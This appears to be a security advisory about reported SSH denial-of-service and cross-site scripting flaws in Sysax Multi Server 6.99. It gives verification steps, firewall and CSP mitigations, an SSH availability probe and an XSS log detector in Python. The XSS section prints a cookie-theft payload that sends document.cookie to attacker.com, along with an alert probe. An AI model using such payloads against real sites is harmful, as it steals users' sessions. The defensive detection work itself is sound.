Multiple 0-days Discovered in Sysax Multi Server 6.99 (SSH DoS & XSS)

Researchers have reported two unpatched (0-day) vulnerabilities in Sysax Multi Server 6.99: a Denial of Service (DoS) in its SSH service and a Cross-Site Scripting (XSS) flaw in its web interface. The DoS lets an attacker crash the service and interrupt file transfers; the XSS lets an attacker run attacker-controlled script in the browser of a user of the server's web interface. The report does not disclose the exact crash trigger or the vulnerable parameter, so the commands below verify exposure and help with detection and containment rather than reproduce the flaws.

You Should Know:

1. SSH Denial of Service (DoS) Exploitation

A flaw in Sysax Multi Server's SSH service lets a remote attacker crash the service, taking SFTP/SSH file transfer down until it is restarted. The report does not publish the malformed input that causes the crash, so the steps below only confirm that an SSH listener is reachable and look for a public module; the banner exchange itself is not an exploit.

Verification Steps:

Confirm the port answers and read the server's identification string (banner check only):
printf 'SSH-2.0-Probe\r\n' | nc -nv -w 3 <TARGET_IP> 22

Check whether Metasploit ships a module instead of assuming a path:
msfconsole
search sysax
use <module path from the search results>
set RHOSTS <TARGET_IP>
run

Mitigation:

Sysax Multi Server runs on Windows, so checking a Linux sshd tells you nothing about it. Confirm the Sysax service is running (and restart it after a crash):
sc query state= all | findstr /i sysax
sc start <SYSAX_SERVICE_NAME>

Temporarily block abusive IPs on the Windows host:
netsh advfirewall firewall add rule name="Block SSH DoS source" dir=in action=block remoteip=<ATTACKER_IP>

On a Linux firewall in front of the server (insert at the top of the chain so an earlier ACCEPT for port 22 does not win):
iptables -I INPUT -s <ATTACKER_IP> -j DROP
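To tell whether the SSH service has actually been knocked over, rather than merely reachable, a small probe that completes only the identification exchange is more useful than a one-line banner grab: run it before and after a test, or on a schedule, and alert on the change. The following Python script is an added example for this write-up, not code from the report or from Sysax. The banner strings used in its checks are constructed samples, and the default host and port are assumptions to be replaced with the target.

```python
"""Availability probe for an SSH listener.

Added example for this write-up, not code from the report or from Sysax. It
connects to a host, reads the RFC 4253 identification string and reports
whether the service is up, so it can be run before and after a suspected
DoS (or on a schedule) to spot a crashed SSH service. Banner strings used
when exercising parse_ssh_banner() are constructed samples, not captured.
"""
import socket
import sys


def parse_ssh_banner(raw: bytes) -> dict:
    """Parse a server identification exchange (RFC 4253 section 4.2).

    A server may send free-text lines before the identification string; the
    first line that starts with "SSH-" is the one that counts. Returns the
    protocol version, software version and optional comment.
    """
    for line in raw.split(b"\n"):
        line = line.rstrip(b"\r")
        if not line.startswith(b"SSH-"):
            continue
        text = line.decode("ascii", errors="replace")
        # Format: SSH-protoversion-softwareversion [SP comments]
        ident, _, comment = text.partition(" ")
        parts = ident.split("-", 2)
        if len(parts) != 3 or not parts[1] or not parts[2]:
            raise ValueError(f"malformed identification string: {text!r}")
        return {
            "protoversion": parts[1],
            "softwareversion": parts[2],
            "comment": comment or None,
        }
    raise ValueError("no SSH identification string in response")


def _read_identification(sock: socket.socket, limit: int = 4096) -> bytes:
    """Read until a complete SSH- line has arrived, a size limit, or EOF."""
    data = b""
    while len(data) < limit:
        chunk = sock.recv(1024)
        if not chunk:
            break
        data += chunk
        # Every element except the last is a complete line.
        if any(l.startswith(b"SSH-") for l in data.split(b"\n")[:-1]):
            break
    return data


def probe_ssh(host: str, port: int = 22, timeout: float = 5.0) -> dict:
    """Return {"up": bool, "banner": dict | None, "error": str | None}.

    Only the identification exchange is performed; no key exchange or
    authentication is attempted, so the probe is safe to run repeatedly.
    A refused connection means the listener is gone; a connection that
    closes without an SSH- line means something answered but not an SSH
    server (both are reported as up=False with the reason in "error").
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            data = _read_identification(sock)
            # Send our own identification so the server closes cleanly.
            sock.sendall(b"SSH-2.0-availability_probe\r\n")
        return {"up": True, "banner": parse_ssh_banner(data), "error": None}
    except (OSError, ValueError) as exc:
        return {"up": False, "banner": None, "error": str(exc)}


if __name__ == "__main__":
    # Assumed default target; pass the Sysax host as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    result = probe_ssh(target)
    state = "UP" if result["up"] else "DOWN"
    print(f"{target}:22 {state} {result['banner'] or result['error']}")
```

The software version returned in the banner also settles whether port 22 on the target is the Sysax service at all or an unrelated OpenSSH daemon, which the nc one-liner leaves to the eye.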

2. Cross-Site Scripting (XSS) Exploitation

The XSS vulnerability lets an attacker inject script through crafted input that the web interface returns to the browser without encoding; the report does not name the affected parameter. Whatever is injected runs in the browser of any user who views the affected page, with that user's session.

Testing for XSS:

Basic probe (a visible alert confirms the injection point):
<script>alert('XSS')</script>

Session-theft payload (only cookies without the HttpOnly flag are readable):
<script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script>

Mitigation:

Only a vendor fix that encodes output removes the flaw; the controls below reduce exposure until then. Both assume a reverse proxy in front of the Sysax web interface, since Apache or Nginx rules do nothing if the Sysax HTTP server is exposed directly.

Web server filtering (Apache): run ModSecurity with the OWASP Core Rule Set, whose XSS rules (REQUEST-941) block common payloads.

Nginx: X-XSS-Protection is deprecated and ignored by current Chrome, Edge and Firefox. Set a Content-Security-Policy instead, and test it against the Sysax UI first, because a strict policy blocks inline scripts the interface may rely on.
location / {
    proxy_pass http://<SYSAX_HOST>:<SYSAX_HTTP_PORT>;
    add_header Content-Security-Policy "default-src 'self'; object-src 'none'; base-uri 'self'" always;
    add_header X-Content-Type-Options "nosniff" always;
}

What Undercode Say

The discovery of these 0-days highlights the risk of exposing enterprise file-transfer software for which no fix exists yet. Until the vendor ships a patch, restrict who can reach the SSH and web ports and segment the host from the rest of the network; apply the patch as soon as it is available.

Additional Commands for Security Checks:

Check whether the SSH port is exposed and identify the server from its banner:
nmap -sV -p 22 <TARGET_IP>

Log analysis for XSS attempts on the reverse proxy (also catches the URL-encoded form):
grep -iE 'script|%3cscript' /var/log/nginx/access.log

Windows command to find the process listening on port 22:
netstat -ano | findstr ":22"
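The grep above and the payloads in section 2 only cover the literal string "script"; real probes arrive URL-encoded, double-encoded, or with no script tag at all (onerror=, javascript:). The following Python detector is an added example and not code from the report or from Sysax. It decodes each request target before matching and runs over a constructed combined-format log: the IPs and paths are invented samples, and the Sysax web interface is assumed to sit behind an Apache or Nginx proxy that writes such a log.

```python
"""Detect XSS probes in web-server access logs.

Added example for this write-up, not code from the report or from Sysax.
`grep -i script` misses URL-encoded payloads (%3Cscript%3E), double encoding
and scriptless vectors such as onerror= or javascript: URIs. This decodes the
request target repeatedly and matches a small set of patterns against the
decoded form. The log lines in SAMPLE_LOG are constructed, not real traffic.
"""
import re
from urllib.parse import unquote_plus

# Request line inside a combined-log-format entry: "GET /path?x=y HTTP/1.1"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>HTTP/[\d.]+)"')

# (name, pattern) pairs evaluated against the fully decoded request target.
# The event-handler list is deliberately explicit to limit false positives
# on ordinary parameters such as "online=1".
XSS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*/?\s*script\b", re.I)),
    ("event_handler", re.compile(r"\bon(load|error|click|mouseover|focus|blur|input|change)\s*=", re.I)),
    ("js_uri", re.compile(r"javascript\s*:", re.I)),
    ("html_tag", re.compile(r"<\s*(svg|img|iframe|object|embed)\b", re.I)),
]

# Constructed sample log (Apache/Nginx combined format), not captured traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Mar/2025:10:00:01 +0000] "GET /login HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Mar/2025:10:00:02 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2048',
    '203.0.113.7 - - [10/Mar/2025:10:00:03 +0000] "GET /search?q=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 2048',
    '198.51.100.2 - - [10/Mar/2025:10:00:04 +0000] "GET /docs/javascript-guide.html HTTP/1.1" 200 9000',
    '203.0.113.9 - - [10/Mar/2025:10:00:05 +0000] "GET /r?u=javascript:alert(document.cookie) HTTP/1.1" 302 0',
]


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing (bounded) to defeat
    double encoding; '+' is treated as a space as in query strings."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(line: str):
    """Return the list of pattern names matched by the request target,
    [] for a clean request, or None if the line has no request field."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    target = fully_decode(m.group("target"))
    return [name for name, rx in XSS_PATTERNS if rx.search(target)]


def scan_log(lines):
    """Return [(line_number, client_ip, hits)] for every suspicious entry."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = classify_request(line)
        if hits:
            client_ip = line.split(" ", 1)[0]
            findings.append((n, client_ip, hits))
    return findings


if __name__ == "__main__":
    for n, ip, hits in scan_log(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {', '.join(hits)}")
```

Pipe the proxy's real access log into scan_log() a line at a time and feed the client IPs into the blocking rules from the mitigation sections; the third sample line shows why decoding matters, since its double-encoded img/onerror payload contains no literal "script" and would sail past the grep.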

Prediction

Expect increased exploitation attempts as details become public. Organizations running Sysax Multi Server should apply the vendor patch as soon as one is released and, until then, take the SSH and web services off untrusted networks.

Expected Output (if the vulnerabilities are present):

  • SSH service stops responding and must be restarted (DoS)
  • The injected script runs in the victim's browser (XSS)
  • Access-log entries containing the probe payloads

Reported By: Yehiamamdouh I – Hackers Feeds